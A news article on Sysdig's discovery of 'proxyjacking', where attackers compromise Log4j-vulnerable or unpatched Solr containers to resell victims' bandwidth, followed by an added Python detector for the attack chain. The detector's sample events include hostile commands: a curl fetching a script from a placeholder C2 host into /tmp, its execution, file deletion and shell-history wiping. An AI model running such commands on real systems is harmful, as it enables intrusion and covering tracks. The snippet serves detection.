The Sysdig Threat Research Team has discovered a new attack vector based on the abuse of legitimate proxy services that let people sell part of their bandwidth to third parties.
Sysdig researchers said that a new attack vector called "proxyjacking" allows cybercriminals to earn hundreds of thousands of dollars a month in the form of passive income.
According to Kaspersky Lab, proxy services work like this: the user installs a client that turns the device into a proxy server. The client makes the device's Internet connection available to an external party, the proxy service, which then resells part of the user's bandwidth to other customers.
Such proxies are popular with users who want to borrow someone else's IP address to bypass geoblocks or visit dubious websites without exposing their own. Payment is usually per IP address, based on the number of hours the client application is running.
In one of the attacks observed by Sysdig researchers, attackers compromised a container in the cloud using a Log4j vulnerability (Log4Shell) and then installed a proxy client that turned the system into a proxy server without the knowledge of the container owner. The attacker then sold the IP address of the compromised device to a proxy service.
Typically, Log4j attacks involve a hacker downloading a backdoor or cryptojacking payload onto a device. Crystal Morin, threat research engineer at Sysdig, said that proxyjacking is similar to cryptojacking in that they both benefit from the victim's bandwidth - and both are about equally beneficial to the attacker. However, the two attacks differ in that the miner uses CPU resources, while proxyjacking uses network resources, with minimal CPU load.
Morin noted that the impact of proxyjacking on the system is negligible: 1 GB of network traffic distributed over the course of a month amounts to tens of megabytes per day - it is very likely that the attack will go unnoticed.
In the discovered attack, hackers compromised an unpatched Apache Solr service running on Kubernetes infrastructure in order to take control of a container in the environment. The cybercriminals then downloaded a malicious script from the C2 server and placed it in the "/tmp" folder so that the compromised container could be used to make money.
The researchers noticed that the attackers tried to cover up traces of malicious activity by clearing the history and deleting the downloaded binary file, as well as temporary files.
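The sequence described above (payload dropped into /tmp, executed, then the binary and shell history removed) can be correlated from container process telemetry. The following is an added illustration, not Sysdig's tooling; it assumes a constructed list of events with a "container" and a "cmd" field and matches on command lines, which is cruder than the structured fields a real sensor provides.

```python
import re
from collections import defaultdict

# Constructed sample events (not real telemetry): one container shows the chain from the article.
EVENTS = [
    {"container": "solr-7f9c", "cmd": "curl -s http://c2.example.invalid/p.sh -o /tmp/p.sh"},
    {"container": "solr-7f9c", "cmd": "sh /tmp/p.sh"},
    {"container": "solr-7f9c", "cmd": "/tmp/pclient --config /tmp/cfg"},
    {"container": "solr-7f9c", "cmd": "rm -f /tmp/p.sh /tmp/pclient"},
    {"container": "solr-7f9c", "cmd": "history -c"},
    {"container": "web-1a2b", "cmd": "curl -s https://api.example.invalid/health"},
]

TMP_PATH = re.compile(r"/tmp/\S+")
HISTORY_WIPE = re.compile(r"history\s+-c|\.(bash|sh|zsh)_history")


def classify(cmd):
    """Return the chain stage(s) one command line matches (empty tuple if none)."""
    argv = cmd.split()
    paths = set(TMP_PATH.findall(cmd))
    stages = []
    if argv and argv[0] in ("curl", "wget") and paths:
        stages.append("download_to_tmp")
    if argv and (argv[0] in paths or (argv[0] in ("sh", "bash") and paths)):
        stages.append("exec_from_tmp")
    if argv and argv[0] == "rm" and paths:
        stages.append("delete_tmp_artifacts")
    if HISTORY_WIPE.search(cmd):
        stages.append("clear_shell_history")
    return tuple(stages)


def stages_by_container(events):
    """Collect the distinct stages each container exhibited, in first-seen order."""
    seen = defaultdict(list)
    for ev in events:
        for stage in classify(ev["cmd"]):
            if stage not in seen[ev["container"]]:
                seen[ev["container"]].append(stage)
    return dict(seen)


def suspicious_containers(events):
    """Flag containers that dropped and ran a /tmp payload and then covered their tracks."""
    hits = []
    for name, stages in stages_by_container(events).items():
        if {"download_to_tmp", "exec_from_tmp"} <= set(stages) and (
                "delete_tmp_artifacts" in stages or "clear_shell_history" in stages):
            hits.append(name)
    return hits
```

Requiring the anti-forensics stage on top of the drop-and-run pair keeps ordinary installers that write to /tmp from firing the rule, while the history wipe alone is still worth a lower-severity alert.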
Researchers estimate that a single hijacked IP address kept online 24 hours a day earns an attacker $9.60 per month. Experts noted that with 100 compromised IP addresses, a cybercriminal can collect passive income of almost $1,000 per month.
If Log4j is exploited on unpatched systems, the figure could be even higher: millions of servers are still running vulnerable versions of the logging library, and according to Censys, more than 23,000 of them are reachable online. “Theoretically, the Log4j vulnerability alone could bring an attacker more than $220,000 in profit per month,” Morin said.
To avoid huge bills for proxy bandwidth, organizations should set billing limits and configure alerts in their monitoring tools, the researchers say.